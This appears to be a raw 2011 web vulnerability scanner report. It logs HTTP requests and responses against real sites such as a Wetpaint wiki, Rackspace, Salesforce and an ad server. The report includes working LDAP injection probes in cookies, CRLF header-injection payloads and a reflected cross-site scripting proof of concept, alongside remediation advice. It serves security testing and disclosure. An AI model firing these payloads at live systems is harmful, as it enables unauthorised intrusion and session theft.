GET /page/News%20&%20Notes HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=*)(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:03:02 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1RFmQnSxpCUDb0KQplXflNS; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=29ACFDB542CC9D231636A2ABAB0EB558; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:03:02 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 48817
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>News & Notes - HTC Smartphone Wiki</title>
<meta name="keywords" content="News & Notes - HTC Smartphone Wiki, HTC pocket pcs,HTC smartphones" /> <meta name="description" content="Welcome to the HTC Wiki While this is a customer forum that is sponsored by HTC, HTC is not endorsing nor condoning any tweaks, hacks, 3rd party downloads, home..." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
GET /page/News%20&%20Notes HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=*)!(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:03:02 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1RFmQnSxpCUDQlnXVdpGpvo; Domain=htcwiki.wetpaint.com; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:03:02 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 48816
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>News & Notes - HTC Smartphone Wiki</title>
<meta name="keywords" content="News & Notes - HTC Smartphone Wiki, HTC pocket pcs,HTC smartphones" /> <meta name="description" content="Welcome to the HTC Wiki While this is a customer forum that is sponsored by HTC, HTC is not endorsing nor condoning any tweaks, hacks, 3rd party downloads, home..." />
<!-- Render IE8 like IE7 --> <meta http-equiv="X-UA-Compatible" content="IE=7" />
The wetst cookie appears to be vulnerable to LDAP injection attacks.
The payloads e12e88b7f72b1e00)(sn=* and e12e88b7f72b1e00)!(sn=* were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /page/Sprint+Touch HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=e12e88b7f72b1e00)(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 301 http://htcwiki.wetpaint.com/page/HTC+Sprint+Touch Date: Sat, 05 Feb 2011 16:03:54 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1Tc3ngTgFfjbDVQBReKOu0D; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=37D200DEA26CB516297F139E657C785E; Path=/ Location: http://htcwiki.wetpaint.com/page/HTC+Sprint+Touch Content-Length: 0 Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:03:54 GMT Connection: close Content-Type: text/html
Request 2
GET /page/Sprint+Touch HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=e12e88b7f72b1e00)!(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 301 http://htcwiki.wetpaint.com/page/HTC+Sprint+Touch Date: Sat, 05 Feb 2011 16:03:54 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1Tc3ngTgFfjbMkmEaMlpYtE; Domain=htcwiki.wetpaint.com; Path=/ Location: http://htcwiki.wetpaint.com/page/HTC+Sprint+Touch Content-Length: 0 Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:03:54 GMT Connection: close Content-Type: text/html
The wetst cookie appears to be vulnerable to LDAP injection attacks.
The payloads 50260929ef7288ed)(sn=* and 50260929ef7288ed)!(sn=* were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /page/android+phones+thru+t-mobile HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=50260929ef7288ed)(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:06:51 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1Tf1cEci1QjC1isFZiwJR4A; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=050EE660B2200406206B1511BC1E48E0; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:06:51 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 32184
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
GET /page/android+phones+thru+t-mobile HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=50260929ef7288ed)!(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:06:54 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1Tf1cEci1QjC1VBXs5hLVz4; Domain=htcwiki.wetpaint.com; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:06:54 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 32182
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The wetst cookie appears to be vulnerable to LDAP injection attacks.
The payloads 420ed5cc116574e)(sn=* and 420ed5cc116574e)!(sn=* were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /page/thread HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=420ed5cc116574e)(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 1
HTTP/1.1 302 Moved Temporarily Date: Sat, 05 Feb 2011 16:05:49 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TVUJ1bfy3T975VOKz4zdgk; Domain=htcwiki.wetpaint.com; Path=/ Set-Cookie: JSESSIONID=D0642FD589895DD7B949209A4F49E1D2; Path=/ Location: http://htcwiki.wetpaint.com/search/everything/thread?contains=thread Content-Length: 0 Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:05:49 GMT Connection: close Content-Type: text/html
Request 2
GET /page/thread HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=420ed5cc116574e)!(sn=*; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sat, 05 Feb 2011 16:05:49 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TVUJ1bfy3T95WfOwfgImIi; Domain=htcwiki.wetpaint.com; Path=/ Location: http://htcwiki.wetpaint.com/search/everything/thread?contains=thread Content-Length: 0 Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:05:49 GMT Connection: close Content-Type: text/html
The exp_last_activity cookie appears to be vulnerable to LDAP injection attacks.
The payloads 80f3942c7df929a3)(sn=* and 80f3942c7df929a3)!(sn=* were each submitted in the exp_last_activity cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /whyrackspace/network/bandwidthbilling.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=80f3942c7df929a3)(sn=*; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... "39941"; var IS_dept = "MH_Sales_en_US"; var IS_invite = "yes";
var IS_UASrackuid = "US4da9da571af9d6d58e6c524219e4d7f8"; var IS_UAScmpc = "cleanEntry"; var IS_UASreferrer = "2f0f5a42a8503e776f91e0e5"; var IS_PageName = "Why Rackspace: The Rackspace Network: Bandwidth Billing:";
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... "39941"; var IS_dept = "MH_Sales_en_US"; var IS_invite = "yes";
var IS_UASrackuid = "US4da9da571af9d6d58e6c524219e4d7f8"; var IS_UAScmpc = "cleanEntry"; var IS_UASreferrer = "http://www.google.com/search?hl=en&q=2f0f5a4242353bda923acdd2"; var IS_PageName = "Why Rackspace: The Rackspace Network: Bandwidth Billing:";
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of the sn request parameter is copied into the Set-Cookie response header. The payload c05ff%0d%0a4e5b36c7f18 was submitted in the sn parameter. This caused a response containing an injected HTTP header.
Request
GET /scripts/wptrk?sn=c05ff%0d%0a4e5b36c7f18&v=20110120041852 HTTP/1.1 Host: create.wetpaint.com Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:00:08 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: JSESSIONID=8CB829864DFEBAF27580A4F19AA1591F; Path=/ Set-Cookie: wptrk="sn=c05ff 4e5b36c7f18&i=1"; Domain=wetpaint.com; Path=/ Set-Cookie: wpptrk=gpvc=1&ab=0; Domain=wetpaint.com; Expires=Sun, 05-Feb-2012 16:00:08 GMT; Path=/ Set-Cookie: wpptrk2d=coppa=; Domain=wetpaint.com; Expires=Mon, 07-Feb-2011 16:00:08 GMT; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:00:08 GMT Vary: Accept-Encoding Content-Type: application/x-javascript;charset=UTF-8 Content-Length: 142
The value of REST URL parameter 2 is copied into the Location response header. The payload f0d45%0d%0afc099dc298 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /servlet/f0d45%0d%0afc099dc298 HTTP/1.1 Host: www.salesforce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: SFDC Location: /servlet/f0d45 fc099dc298/ Date: Sat, 05 Feb 2011 15:53:04 GMT Connection: close Content-Length: 91
The URL has moved to <a href="/servlet/f0d45 fc099dc298/">/servlet/f0d45 fc099dc298/</a>
4. Cross-site scripting (reflected)previousnext There are 609 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68fe2"><script>alert(1)</script>fb7584e1aad was submitted in the fpid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /server/pixel.htm?fpid=68fe2"><script>alert(1)</script>fb7584e1aad&t=SZ0ow4Nphk6QF4pEA%2fVMyWaMT7jB%2b6YWlSbtq1MTlw4wwHhN8C4NevvUFcvC6BcllnpjtVTlx6Lo00KykqDZYlCIlwCpxQ0RPpuZrKYlf%2bQ%3d%7csdNiQEA8dhzYJiYNhzK0rFlA6psa777s5ejGP%2flK%2bQo%3d HTTP/1.1 Host: ad.turn.com Proxy-Connection: keep-alive Referer: http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&mktid=83&mpid=1051202&fpid=-1&rnd=2858799619219382112&nu=n&sp=n Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid=3011330574290390485; adImpCount=FM4QLcaMabkQsarcOBMTT_qd1v3GGeBcoJK0MOl0KG-Y481wEkFtGX7HudJA1SwJY9n9GIWJHDTqbWbTuEexfNzeQdD3uMEbsSJGoH6nZcvCzn_rbeUw4N91a2HFDwx7Wl6PMIbl8VoYkne2SJkXTcTcqhcYEXFRrx1COjt-xQdPBFgEFn33aBMbAqV_0XEIioGKZSAftgkVYZTzRayYVmmTJdkIn7237siDdt9MzJqJi5T6FYiHf9o35IlREqTNFveKpsZQ30qpNKi15RJt04BNhaXhDlSq6EvznmypgJEkna5GLuKLpEu7eZEeTMi7F6sK_rp2soXzwueUGRFartfze4TUjaNUIXjW8HpTdIXW8uxzXCZHw_1hR9tJint6dsPDEFhRxd_Mub3GEI1LN-tHiIt90vCIZrFIVkRcrTHWSuqW6r5ZIwUtscKD_QT9RhXOUlzX0--TPsid5EqGlKaR8fzj-CgEMyGy4iMXI1WxKbXh9CKgY6S3LP_zmj75AgqPmyW7n-K57XLwzviwi0UeS0QSNHqXIchkIsQCETGT3yD6yFHAIahzcKETB33UwCPq2GhFCxYySztyqVkKk9fqbN4-YU4FEz0wwkD5vsFOGK_87tDq8e92tNo34emrEgGEUj-NO1cCBiKRN0KNH1ftcOyrV1OLoU5x9aMp-92fSDdx8Pm4E6I95eyuD_EIQOJmu9RYL7YOIJ6DsZdIlrLgwokXGxtO8_jRpe316oYDuH7CMSEB_S7o6Xm3tvDBfH77IJVG0N6dycTdcjtOKF0Cz2TbSViJ-oT4nVLBUOQ7zE-OOnjPRQ6BZXJCY0oCMrkBfNspHfysXvb7GqOmGNAITbT7Z6AmMx12CVhoBV8PCKPJoslzeIPsOadDQ5GApTHEeUcb_20FLCe61hOZos4ND7pDMbh_Nz4asivfvnRRu_fmnuOn7vvqoBU15Zmhn2aVSJry2cIXXaBci8YswRWnz3-1lFmH8NpHbFKrPy3hBObtf8ALhKpons6mVN9Ng_E4yJzpnqztVh_CB-KMHlM4At-mEES-WC-9xjj3t3cnzJw50Wq6BglWv58k-98YkSbTm3kPOUdWBiWoLi0oN0AgeHAdeFjGHSfjDkMzE5p5e_oJDB2Um-liToPNlmN15FjrbRSBV8G9GwEgDofeTOxem0_gMApf3YWMEr3kQAQnXe4HjQMTBDROpzYRLGofXKwaWNtdj1-GtHzOUqyENh2k1W2pFwJOjkpENaGP0tqhG0BtDC_eTH_Ts10GvA6WhyC22lBHkEPeNKFx7RiTWcHRNLuEX2-svGHkdhG53xdJo9qHwXLy45nY7LSpUbn803gUXikBp5CFzTHxBLV0jIUUb9PGuTCtW-hvx86uIjCl7RrDpkAZSszkN92RjKcOSHyDTphfUd0ZqQTAbIYvZtNr_wQwmIEY35OpKNWhyGwNPlAh_ANj4laYRoTBJxnGQ7wgWZt0CSpxlrfASU5W2a6su59vlF-h6V4zet13tlPhRMEiyYm825vPff2nJDmVgFpIKs_vIo7sFsppJ43d8oTEgInxyFT6vScD8wD9aZjmMC0w6HS0HlWcNr1j-PhGS2ikng608Ubz0iz0TtbwhgQZq5IdyfSisA1KqAwL3sZErWVr76O0bqQTEPkhkBBP4vNeu_uKiDKKl73FedJ05pAh6qV14YUcXNrVmSSI1FzEzQ65n9aZSqRKUiLFvw0_FzJQi642bOf20jjwau1yNWbWc_OZc_OPEEY_dnkrDVdmeoMCTOxN_xl7C-3y_RTPHX8tA53fNzl8qfH897V8IhWPCe1DLrZ9lRQtTCZwINCJg6hyABA61hUJaqPVyX7fV7Pa1PW0-yYXb_USKuin2pZCaBr_uY_2UBH6Bm4UktJmd6sVQvXXEqhe9E5LsneRLFWbUdQszzXxD5egB584f5Iq0VaWXCofBTTX6PHG8K6lFCCN0TTnR1jCog1stnuLrLH_TLw0g_9l8j595C25K_O7nXuUqzkznnHJS2oIivO1MtzkhTD8tggahFLAwdtimGiAzgIbfwh3tPXiXBZiPEc6jmaSPplk32IRb7Tl08IFN1OghxmtWT_y47n5TtZS9Ky93uZuiaOzgh6RPqobZokxjCycBjwJJ-OqeZ3YCRoZ5XICuXWVHfipzGbbMT7XgVwScM8a1QBrHN9hJ559oPfWNXLGQYJF8WI3xWHXIXB86oJHZOjQy7IdFPhSTsF2yrOAh9s72IpPTbIy0ryOZR5kHQoGKZaDQPufKDCKOsAs5UyVIQTo0ztnk49jL0nNFaq4usSu0TQiqXjP7CIAd_5FtzMDApKZjTZ9VwWqS_hi3W5FLLAcz8HdwETYSzM0iqfAGlpVHegt_TIDru8ZVGlo2JchDi2BE0kETeswJqfjIM8eqB1CZXkSQ7Z_VjVnYvzBVNyB9AksqD2lQZb2X0IEqN843HNpf9LL79Gl1KBsoCUhcPx0GvFd6LDM_NesCTjn8qfPanRhqfFt_Mz5uEh2A3HFoGkf8ppxZxL6925r_GgrDoF5KcCR0z_dNX3kzjeRcgqW8BhR69hQhpeZrZnEJ52ohaD3WrTkTUj4YJ6Td6PLaDgaJxtMnnZrfAlG0SSD0cpxrho96Q5aYPi9en1l66z-sdlCvM2HwHHvukFOG1d5EaBIpvNzbIjvRqOmzYDhYzHqcbaWBj06fa97gFmB5jdUYj5pSK3CD2Yuk0PK5FYetxUklFsdind5sgdq4uZcD2KLx9Zf7jaxnwz6suaPAnsGTiQgiUvKmhf1LhrytQYKxDy-h4T29iDJXVr_vHZNnZTSMo3FOqO76V7e32Mz948gl-62XtaGUS8uw5NCpnBNXGUaigKHIg84ueIc4t5Yp3YWsvWh2i358DyJOyzgpnBHfTKfL-U_Busa7oEsjSep6DjzyTifPlN_P4smDk3kLq_iHqbXQ5svnKXdR0fKJFj2seLH8BbDFMsPiVsBIQ44v1dSgCalvY0FxkkJ5w0OZeWQP34jwLIAF168EspxmNyBZAxjbmEt8kjG7dRMykkE2LHXhz6x23r28D5B1-HnnnOalxwc8pVPIG67O2v9MtuGBypG0oO1sVM2Vbs7HFOP9G8F0R3RxUgEDCioFUEKPhCNOF99OE